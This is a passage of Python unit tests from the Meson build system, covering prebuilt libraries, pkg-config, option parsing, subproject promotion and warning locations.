cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '150 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '150 reserved targets')
targets = mesonbuild.coredata.FORBIDDEN_TARGET_NAMES
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile]
else:
link_cmd = ['ar', 'csr', outfile, objectfile]
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that the we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build
Also test that it's not a hard error to have unsatisfiable library deps
since system libraries -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
@mock.patch.dict(os.environ)
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '44 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix(), '-DLIBFOO']
# pkg-config and pkgconf does not respect the same order
self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs))
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '40 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
# When running under Travis Mac CI, the file updates seem to happen
# too fast so the timestamps do not get properly updated.
# Call this method before file operations in appropriate places
# to make things work.
def mac_ci_delay(self):
if is_osx() and is_ci():
import time
time.sleep(1)
def test_options_with_choices_changing(self) -> None:
"""Detect when options like arrays or combos have their choices change."""
testdir = Path(os.path.join(self.unit_test_dir, '84 change option choices'))
options1 = str(testdir / 'meson_options.1.txt')
options2 = str(testdir / 'meson_options.2.txt')
# Test that old options are changed to the new defaults if they are not valid
real_options = str(testdir / 'meson_options.txt')
self.addCleanup(os.unlink, real_options)
shutil.copy(options1, real_options)
self.init(str(testdir))
self.mac_ci_delay()
shutil.copy(options2, real_options)
self.build()
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == 'combo':
self.assertEqual(item['value'], 'b')
self.assertEqual(item['choices'], ['b', 'c', 'd'])
elif item['name'] == 'arr':
self.assertEqual(item['value'], ['b'])
self.assertEqual(item['choices'], ['b', 'c', 'd'])
self.wipe()
self.mac_ci_delay()
# When the old options are valid they should remain
shutil.copy(options1, real_options)
self.init(str(testdir), extra_args=['-Dcombo=c', '-Darray=b,c'])
self.mac_ci_delay()
shutil.copy(options2, real_options)
self.build()
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == 'combo':
self.assertEqual(item['value'], 'c')
self.assertEqual(item['choices'], ['b', 'c', 'd'])
elif item['name'] == 'arr':
self.assertEqual(item['value'], ['b', 'c'])
self.assertEqual(item['choices'], ['b', 'c', 'd'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'],
cwd=workdir,
stdout=subprocess.DEVNULL)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('102 subdir parse error', os.path.join('subdir', 'meson.build')),
('103 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
for l in ['cpp', 'cs', 'd', 'java', 'cuda', 'fortran', 'objc', 'objcpp', 'rust']:
try:
comp = env.detect_compiler_for(l, MachineChoice.HOST)
with tempfile.TemporaryDirectory() as d:
comp.sanity_check(d, env)
langs.append(l)
except EnvironmentException:
pass
# The D template fails under mac CI and we don't know why.
# Patches welcome
if is_osx():
langs = [l for l in langs if l != 'd']
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in {'c', 'cpp', 'd'}:
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
elif lang in {'java'}:
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
f.write('public class Foo { public static void main() {} }')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '172 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '181 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('WARNING: target links against shared modules. This is not '
'recommended as it is not supported on some platforms')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# static libraries are not linkable with -l with msvc because meson installs them
# as .a files which unix_args_to_native will not know as it expects libraries to use
# .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
# this tests needs to use shared libraries to test the path resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert user of library will be rebuild
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_builddir
self.builddir = initial_installdir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception(f'Missing {arg} value?')
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception(f'Missing {arg} value?')
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
out = self.init(testdir, extra_args=['--profile-self', '--fatal-meson-warnings'])
self.assertNotIn('[default: true]', out)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('default_library')].value, 'static')
self.assertEqual(obj.options[OptionKey('warning_level')].value, '1')
self.assertEqual(obj.options[OptionKey('set_sub_opt')].value, True)
self.assertEqual(obj.options[OptionKey('subp_opt', 'subp')].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
if isinstance(cm.exception, subprocess.CalledProcessError):
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
else:
self.assertIn('as both', str(cm.exception))
self.init(testdir)
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
if isinstance(cm.exception, subprocess.CalledProcessError):
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
else:
self.assertIn('as both', str(cm.exception))
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('default_library')].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('default_library')].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('default_library')].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
msg = "Option 'foo' must have a value separated by equals sign."
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
self.init(testdir, extra_args=['-Dfoo'])
if isinstance(cm.exception, subprocess.CalledProcessError):
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn(msg, cm.exception.output)
else:
self.assertIn(msg, str(cm.exception))
self.init(testdir)
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
self.setconf('-Dfoo')
if isinstance(cm.exception, subprocess.CalledProcessError):
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn(msg, cm.exception.output)
else:
self.assertIn(msg, str(cm.exception))
self.wipe()
# It is not an error to set wrong option for unknown subprojects or
# language because we don't have control on which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('subp_opt', 'subp')].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('set_percent_opt')].value, 'myoption%')
self.wipe()
# Setting a 2nd time the same option should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar',
'-Db_lundef=false', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('bindir')].value, 'bar')
self.assertEqual(obj.options[OptionKey('buildtype')].value, 'release')
self.assertEqual(obj.options[OptionKey('b_sanitize')].value, 'thread')
self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('bindir')].value, 'foo')
self.assertEqual(obj.options[OptionKey('buildtype')].value, 'plain')
self.assertEqual(obj.options[OptionKey('b_sanitize')].value, 'address')
self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dfoo'])
self.wipe()
except KeyError:
# Ignore KeyError, it happens on CI for compilers that does not
# support b_sanitize. We have to test with a base option because
# they used to fail this test with Meson 0.46 an earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '207 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\| WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\| WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\| WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
